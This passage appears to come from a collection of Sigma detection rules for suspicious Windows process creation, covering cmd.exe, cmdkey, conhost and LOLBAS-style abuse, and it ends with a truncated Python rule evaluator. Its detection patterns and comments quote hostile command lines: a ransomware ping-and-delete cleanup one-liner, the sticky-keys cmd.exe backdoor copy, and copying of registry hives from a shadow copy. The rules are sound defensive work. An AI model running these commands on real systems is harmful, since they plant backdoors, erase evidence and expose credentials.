'/cschtasks'\n            - '/cbitsadmin'\n            - '/ccertutil'\n            - '/kwhoami'\n            - '/kpowershell'\n            - '/kschtasks'\n            - '/kbitsadmin'\n            - '/kcertutil'\n    selection3:  # missing space after the /c\n        CommandLine|contains:\n            - 'cmd.exe /c'\n            - 'cmd /c'\n            - 'cmd.exe /k'\n            - 'cmd /k'\n            - 'cmd.exe /r'\n            - 'cmd /r'\n    filter_generic:\n        CommandLine|contains:\n            - 'cmd.exe /c '\n            - 'cmd /c '\n            - 'cmd.exe /k '\n            - 'cmd /k '\n            - 'cmd.exe /r '\n            - 'cmd /r '\n    filter_fp:\n        
- CommandLine|contains: 'AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\node_modules'\n        - CommandLine|endswith: 'cmd.exe/c .'\n        - CommandLine: 'cmd.exe /c'\n    condition: 1 of selection* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml",
    "content": "title: NtdllPipe Like Activity Execution\nid: bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2\nstatus: test\ndescription: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe\nreferences:\n    - https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-05\nmodified: 2023-03-07\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'type %windir%\\system32\\ntdll.dll'\n            - 'type %systemroot%\\system32\\ntdll.dll'\n            - 'type c:\\windows\\system32\\ntdll.dll'\n            - '\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_path_traversal.yml",
    "content": "title: Potential CommandLine Path Traversal Via Cmd.EXE\nid: 087790e3-3287-436c-bccf-cbd0184a7db1\nstatus: test\ndescription: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking\nreferences:\n    - https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/\n    - https://twitter.com/Oddvarmoe/status/1270633613449723905\nauthor: xknow @xknow_infosec, Tim Shelton\ndate: 2020-06-11\nmodified: 2023-03-06\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - ParentImage|endswith: '\\cmd.exe'\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'cmd.exe'\n    selection_flags:\n        - ParentCommandLine|contains:\n              - '/c'\n              - '/k'\n              - '/r'\n        - CommandLine|contains:\n              - '/c'\n              - '/k'\n              - '/r'\n    selection_path_traversal:\n        - ParentCommandLine: '/../../'\n        - CommandLine|contains: '/../../'\n    filter_java:\n        CommandLine|contains: '\\Tasktop\\keycloak\\bin\\/../../jre\\bin\\java'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Java tools are known to produce false-positive when loading libraries\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml",
    "content": "title: Potentially Suspicious Ping/Copy Command Combination\nid: ded2b07a-d12f-4284-9b76-653e37b6c8b0\nstatus: test\ndescription: |\n    Detects uncommon and potentially suspicious one-liner command containing both \"ping\" and \"copy\" at the same time, which is usually used by malware.\nreferences:\n    - Internal Research\nauthor: X__Junior (Nextron Systems)\ndate: 2023-07-18\nmodified: 2024-03-06\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Note: In the case of sysmon and similar logging utilities, see this discussion https://github.com/SigmaHQ/sigma/discussions/4277\n    selection_cmd:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_action:\n        CommandLine|contains|all:\n            - 'ping' # Covers \"ping\" and \"ping.exe\"\n            - 'copy '\n    selection_cli_1:\n        CommandLine|contains|windash: ' -n ' # Count\n    selection_cli_2:\n        CommandLine|contains|windash: ' -y '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml",
    "content": "title: Suspicious Ping/Del Command Combination\nid: 54786ddc-5b8a-11ed-9b6a-0242ac120002\nstatus: test\ndescription: Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example\nreferences:\n    - https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack\n    - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf\n    - https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware\nauthor: Ilya Krestinichev\ndate: 2022-11-03\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Note: In the case of sysmon and similar logging utilities, see this discussion https://github.com/SigmaHQ/sigma/discussions/4277\n    # Example: \"C:\\Windows\\System32\\cmd.exe\"  /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 \"C:\\Users\\User\\Desktop\\lockbit\\lockbit.exe\" & Del /f /q \"C:\\Users\\User\\Desktop\\lockbit\\lockbit.exe\".\n    selection_count:\n        CommandLine|contains|windash: ' -n '\n    selection_nul:\n        CommandLine|contains: 'Nul' # Covers \"> Nul\" and \">Nul \"\n    selection_del_param:\n        CommandLine|contains|windash:\n            - ' -f '\n            - ' -q '\n    selection_all:\n        CommandLine|contains|all:\n            - 'ping' # Covers \"ping\" and \"ping.exe\"\n            - 'del '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml",
    "content": "title: Potentially Suspicious CMD Shell Output Redirect\nid: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892\nrelated:\n    - id: aa2efee7-34dd-446e-8a37-40790a66efd7\n      type: derived\n    - id: 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a\n      type: similar\nstatus: test\ndescription: |\n    Detects inline Windows shell commands redirecting output via the \">\" symbol to a suspicious location.\n    This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as \"hostname\" and \"dir\" to files for future exfiltration.\nreferences:\n    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-12\nmodified: 2024-03-19\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cli_1:\n        CommandLine|contains:\n            # Note: Add more suspicious locations as you find them\n            # Note: The space from the start is missing to cover append operations \">>\"\n            # Note: We use the \"?\" to account for both a single and a double quote\n            # Note: If you want to account for more spaces which is still a valid bypass option. 
Use a regex with \"\\s\"\n            - '>?%APPDATA%\\'\n            - '>?%TEMP%\\'\n            - '>?%TMP%\\'\n            - '>?%USERPROFILE%\\'\n            - '>?C:\\ProgramData\\'\n            - '>?C:\\Temp\\'\n            - '>?C:\\Users\\Public\\'\n            - '>?C:\\Windows\\Temp\\'\n    selection_cli_2:\n        CommandLine|contains:\n            - ' >'\n            - '\">'\n            - \"'>\"\n        CommandLine|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\'\n    condition: selection_img and 1 of selection_cli_*\nfalsepositives:\n    - Legitimate admin or third party scripts used for diagnostic collection might generate some false positives\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution.yml",
    "content": "title: Directory Removal Via Rmdir\nid: 41ca393d-538c-408a-ac27-cf1e038be80c\nstatus: test\ndescription: |\n    Detects execution of the builtin \"rmdir\" command in order to delete directories.\n    Adversaries may delete files left behind by the actions of their intrusion activity.\n    Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\n    Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase\nauthor: frack113\ndate: 2022-01-15\nmodified: 2023-03-07\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_rmdir:\n        CommandLine|contains: 'rmdir'\n    selection_flags:\n        CommandLine|contains:\n            - '/s'\n            - '/q'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_shadowcopy_access.yml",
    "content": "title: Copy From VolumeShadowCopy Via Cmd.EXE\nid: c73124a7-3e89-44a3-bdc1-25fe4df754b1\nstatus: test\ndescription: Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)\nreferences:\n    - https://twitter.com/vxunderground/status/1423336151860002816?s=20\n    - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection\n    - https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/\nauthor: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)\ndate: 2021-08-09\nmodified: 2023-03-07\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # cmd /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM\\\n        # There is an additional \"\\\" to escape the special \"?\"\n        CommandLine|contains|all:\n            - 'copy '\n            - '\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy'\n    condition: selection\nfalsepositives:\n    - Backup scenarios using the commandline\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_stdin_redirect.yml",
    "content": "title: Read Contents From Stdin Via Cmd.EXE\nid: 241e802a-b65e-484f-88cd-c2dc10f9206d\nrelated:\n    - id: 00a4bacd-6db4-46d5-9258-a7d5ebff4003\n      type: obsolete\nstatus: test\ndescription: Detect the use of \"<\" to read and potentially execute a file via cmd.exe\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md\n    - https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-07\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd:\n        - OriginalFileName: 'Cmd.Exe'\n        - Image|endswith: '\\cmd.exe'\n    selection_cli:\n        CommandLine|contains: '<'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml",
    "content": "title: Sticky Key Like Backdoor Execution\nid: 2fdefcb3-dbda-401e-ae23-f0db027628bc\nrelated:\n    - id: baca5663-583c-45f9-b5dc-ea96a22ce542\n      type: derived\nstatus: test\ndescription: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen\nreferences:\n    - https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors\nauthor: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community\ndate: 2018-03-15\nmodified: 2023-03-07\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.008\n    - car.2014-11-003\n    - car.2014-11-008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\winlogon.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wscript.exe'\n            - '\\wt.exe'\n        CommandLine|contains:\n            - 'sethc.exe'\n            - 'utilman.exe'\n            - 'osk.exe'\n            - 'Magnify.exe'\n            - 'Narrator.exe'\n            - 'DisplaySwitch.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml",
    "content": "title: Persistence Via Sticky Key Backdoor\nid: 1070db9a-3e5d-412e-8e7b-7183b616e1b3\nstatus: test\ndescription: |\n    By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\n    When the sticky keys are \"activated\" the privilleged shell is launched.\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html\n    - https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf\n    - https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors\nauthor: Sreeman\ndate: 2020-02-18\nmodified: 2023-03-07\ntags:\n    - attack.persistence\n    - attack.t1546.008\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'copy '\n            - '/y '\n            - 'C:\\windows\\system32\\cmd.exe C:\\windows\\system32\\sethc.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_type_arbitrary_file_download.yml",
    "content": "title: Potential Download/Upload Activity Using Type Command\nid: aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f\nstatus: test\ndescription: Detects usage of the \"type\" command to download/upload data from WebDAV server\nreferences:\n    - https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-14\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    # Note that since built in CMD commands do not trigger a process creation. This would be detected only if used in a \"/c\" command\n    selection_upload:\n        CommandLine|contains|all:\n            - 'type '\n            - ' > \\\\\\\\'\n    selection_download:\n        CommandLine|contains|all:\n            - 'type \\\\\\\\'\n            - ' > ' # Space are added to increase atom length and speed up matching. If your backend can handle this remove the space\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_unusual_parent.yml",
    "content": "title: Unusual Parent Process For Cmd.EXE\nid: 4b991083-3d0e-44ce-8fc4-b254025d8d4b\nstatus: test\ndescription: Detects suspicious parent process for cmd.exe\nreferences:\n    - https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-21\nmodified: 2023-12-05\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\cmd.exe'\n        ParentImage|endswith:\n            - '\\csrss.exe'\n            - '\\ctfmon.exe'\n            - '\\dllhost.exe'\n            - '\\epad.exe'\n            - '\\FlashPlayerUpdateService.exe'\n            - '\\GoogleUpdate.exe'\n            - '\\jucheck.exe'\n            - '\\jusched.exe'\n            - '\\LogonUI.exe'\n            - '\\lsass.exe'\n            - '\\regsvr32.exe'\n            - '\\SearchIndexer.exe'\n            - '\\SearchProtocolHost.exe'\n            - '\\SIHClient.exe'\n            - '\\sihost.exe'\n            - '\\slui.exe'\n            - '\\spoolsv.exe'\n            - '\\sppsvc.exe'\n            - '\\taskhostw.exe'\n            - '\\unsecapp.exe'\n            - '\\WerFault.exe'\n            - '\\wermgr.exe'\n            - '\\wlanext.exe'\n            - '\\WUDFHost.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml",
    "content": "title: New Generic Credentials Added Via Cmdkey.EXE\nid: b1ec66c6-f4d1-4b5c-96dd-af28ccae7727\nstatus: test\ndescription: |\n    Detects usage of \"cmdkey.exe\" to add generic credentials.\n    As an example, this can be used before connecting to an RDP session via command line interface.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-03\nmodified: 2024-03-05\ntags:\n    - attack.credential-access\n    - attack.t1003.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmdkey.exe'\n        - OriginalFileName: 'cmdkey.exe'\n    selection_cli_generic:\n        CommandLine|contains|windash: ' -g' # Generic\n    selection_cli_user:\n        CommandLine|contains|windash: ' -u' # User\n    selection_cli_password:\n        CommandLine|contains|windash: ' -p' # Password\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage for administration purposes\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: RDP to DomainController\n      technique: T1021.001\n      atomic_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml",
    "content": "title: Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE\nid: 07f8bdc2-c9b3-472a-9817-5a670b872f53\nstatus: test\ndescription: Detects usage of cmdkey to look for cached credentials on the system\nreferences:\n    - https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation\n    - https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx\n    - https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1003.005/T1003.005.md#atomic-test-1---cached-credential-dump-via-cmdkey\nauthor: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-01-16\nmodified: 2024-03-05\ntags:\n    - attack.credential-access\n    - attack.t1003.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmdkey.exe'\n        - OriginalFileName: 'cmdkey.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' -l'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate administrative tasks\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Cached Credential Dump via Cmdkey\n      technique: T1003.005\n      atomic_guid: 56506854-89d6-46a3-9804-b7fde90791f9\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmdl32_arbitrary_file_download.yml",
    "content": "title: Potential Arbitrary File Download Via Cmdl32.EXE\nid: f37aba28-a9e6-4045-882c-d5004043b337\nstatus: test\ndescription: |\n    Detects execution of Cmdl32 with the \"/vpn\" and \"/lan\" flags.\n    Attackers can abuse this utility in order to download arbitrary files via a configuration file.\n    Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/\n    - https://twitter.com/SwiftOnSecurity/status/1455897435063074824\n    - https://github.com/LOLBAS-Project/LOLBAS/pull/151\nauthor: frack113\ndate: 2021-11-03\nmodified: 2024-04-22\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmdl32.exe'\n        - OriginalFileName: CMDL32.EXE\n    selection_cli:\n        CommandLine|contains|all:\n            - '/vpn'\n            - '/lan'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml",
    "content": "title: CMSTP Execution Process Creation\nid: 7d4cdc5a-0076-40ca-aac8-f7e714570e47\nstatus: stable\ndescription: Detects various indicators of Microsoft Connection Manager Profile Installer execution\nreferences:\n    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/\nauthor: Nik Seetharaman\ndate: 2018-07-16\nmodified: 2020-12-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218.003\n    - attack.g0069\n    - car.2019-04-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # CMSTP Spawning Child Process\n    selection:\n        ParentImage|endswith: '\\cmstp.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate CMSTP use (unlikely in modern enterprise environments)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_comodo_ssh_shellhost_cmd_spawn.yml",
    "content": "title: OpenEDR Spawning Command Shell\nid: 7f3a9c2d-4e8b-4a7f-9d3e-5c6f8a9b2e1d\nstatus: experimental\ndescription: |\n    Detects the OpenEDR ssh-shellhost.exe spawning a command shell (cmd.exe) or PowerShell with PTY (pseudo-terminal) capabilities.\n    This may indicate remote command execution through OpenEDR's remote management features, which could be legitimate administrative activity or potential abuse of the remote access tool.\n    Threat actors may leverage OpenEDR's remote shell capabilities to execute commands on compromised systems, facilitating lateral movement or other command-and-control operations.\nauthor: '@kostastsale'\ndate: 2026-02-19\nreferences:\n    - https://kostas-ts.medium.com/detecting-abuse-of-openedrs-permissive-edr-trial-a-security-researcher-s-perspective-fc55bf53972c\ntags:\n    - attack.execution\n    - attack.t1059.003\n    - attack.lateral-movement\n    - attack.t1021.004\n    - attack.command-and-control\n    - attack.t1219\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        ParentImage|endswith: '\\ITSMService.exe'\n        Image|endswith: '\\ssh-shellhost.exe'\n        CommandLine|contains: '--pty'\n    selection_cli_shell:\n        CommandLine|contains:\n            - 'bash'\n            - 'cmd'\n            - 'powershell'\n            - 'pwsh'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of OpenEDR for remote command execution\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_configsecuritypolicy_download_file.yml",
    "content": "title: Arbitrary File Download Via ConfigSecurityPolicy.EXE\nid: 1f0f6176-6482-4027-b151-00071af39d7e\nstatus: test\ndescription: |\n    Detects the execution of \"ConfigSecurityPolicy.EXE\", a binary part of Windows Defender used to manage settings in Windows Defender.\n    Users can configure different pilot collections for each of the co-management workloads.\n    It can be abused by attackers in order to upload or download files.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/\nauthor: frack113\ndate: 2021-11-26\nmodified: 2022-05-16\ntags:\n    - attack.exfiltration\n    - attack.t1567\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - CommandLine|contains: ConfigSecurityPolicy.exe\n        - Image|endswith: '\\ConfigSecurityPolicy.exe'\n        - OriginalFileName: 'ConfigSecurityPolicy.exe'\n    selection_url:\n        CommandLine|contains:\n            - 'ftp://'\n            - 'http://'\n            - 'https://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_conhost_headless_powershell.yml",
    "content": "title: Powershell Executed From Headless ConHost Process\nid: 056c7317-9a09-4bd4-9067-d051312752ea\nrelated:\n    - id: 00ca75ab-d5ce-43be-b86c-55ff39c6abfc\n      type: derived\nstatus: test\ndescription: |\n    Detects the use of powershell commands from headless ConHost window.\n    The \"--headless\" flag hides the windows from the user upon execution.\nreferences:\n    - https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\nauthor: Matt Anderson (Huntress)\ndate: 2024-07-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1059.003\n    - attack.t1564.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\conhost.exe'\n        - OriginalFileName: 'CONHOST.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - '--headless'\n            - 'powershell'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_conhost_legacy_option.yml",
    "content": "title: Suspicious High IntegrityLevel Conhost Legacy Option\nid: 3037d961-21e9-4732-b27a-637bcc7bf539\nstatus: test\ndescription: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.\nreferences:\n    - https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29\n    - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/\n    - https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control\nauthor: frack113\ndate: 2022-12-09\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        IntegrityLevel:\n            - 'High'\n            - 'S-1-16-12288'\n        CommandLine|contains|all:\n            - 'conhost.exe'\n            - '0xffffffff'\n            - '-ForceV1'\n    condition: selection\nfalsepositives:\n    - Very Likely, including launching cmd.exe via Run As Administrator\nlevel: informational\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml",
    "content": "title: Conhost.exe CommandLine Path Traversal\nid: ee5e119b-1f75-4b34-add8-3be976961e39\nstatus: test\ndescription: detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking\nreferences:\n    - https://pentestlab.blog/2020/07/06/indirect-command-execution/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-14\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentCommandLine|contains: 'conhost'\n        CommandLine|contains: '/../../'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml",
    "content": "title: Uncommon Child Process Of Conhost.EXE\nid: 7dc2dedd-7603-461a-bc13-15803d132355\nrelated:\n    - id: dfa03a09-8b92-4d83-8e74-f72839b1c407\n      type: similar\nstatus: test\ndescription: Detects uncommon \"conhost\" child processes. This could be a sign of \"conhost\" usage as a LOLBIN or potential process injection activity.\nreferences:\n    - http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/\nauthor: omkar72\ndate: 2020-10-25\nmodified: 2023-12-11\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\conhost.exe'\n    filter_main_conhost:\n        Image|endswith: ':\\Windows\\System32\\conhost.exe'\n    filter_main_null:\n        Image: null\n    filter_main_empty:\n        Image: ''\n    filter_optional_provider:\n        Provider_Name: 'SystemTraceProvider-Process'  # Race condition with SystemTrace doesn't provide all fields.\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
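The detection blocks of three rules above (the ping/del combination, the cmdkey cached-credential recon and the uncommon conhost child process) evaluated over constructed process_creation events, as an added example that is not SigmaHQ or pySigma code. It implements only the subset of the Sigma specification those rules use, approximates the `windash` modifier with the `-`/`/` pair (the real modifier also expands Unicode dashes), and the five sample events are hand-written rather than real telemetry.

```python
"""Evaluate a few of this page's Sigma process_creation rules over sample events.
Added example, not SigmaHQ or pySigma code; it supports only what these rules use:
contains/endswith, the 'all' and 'windash' modifiers, null/empty values, and
'all of X*' / 'N of X*' conditions combined with and/or/not."""
import ast
import re
from itertools import product


def _windash(value):
    """Simplified Sigma 'windash': each ' -' flag prefix may also appear as ' /'.
    Assumption: the Unicode dash variants the real modifier adds are not needed here."""
    parts = value.split(" -")
    return {parts[0] + "".join(s + p for s, p in zip(seps, parts[1:]))
            for seps in product((" -", " /"), repeat=len(parts) - 1)}


def _match_one(field_value, op, pattern):
    """Sigma string matching is case-insensitive; a null value matches a missing field."""
    if pattern is None:
        return field_value is None
    fv = "" if field_value is None else str(field_value).lower()
    p = pattern.lower()
    return {"contains": p in fv, "endswith": fv.endswith(p), "equals": fv == p}[op]


def _field_matches(event, spec, values):
    """spec is 'Field|mod|mod'; a list of values is OR unless the 'all' modifier is set."""
    name, *mods = spec.split("|")
    op = next((m for m in mods if m in ("contains", "endswith")), "equals")
    values = values if isinstance(values, list) else [values]
    # windash turns one value into a group of variants; any variant satisfies that value
    groups = [sorted(_windash(v)) if "windash" in mods else [v] for v in values]
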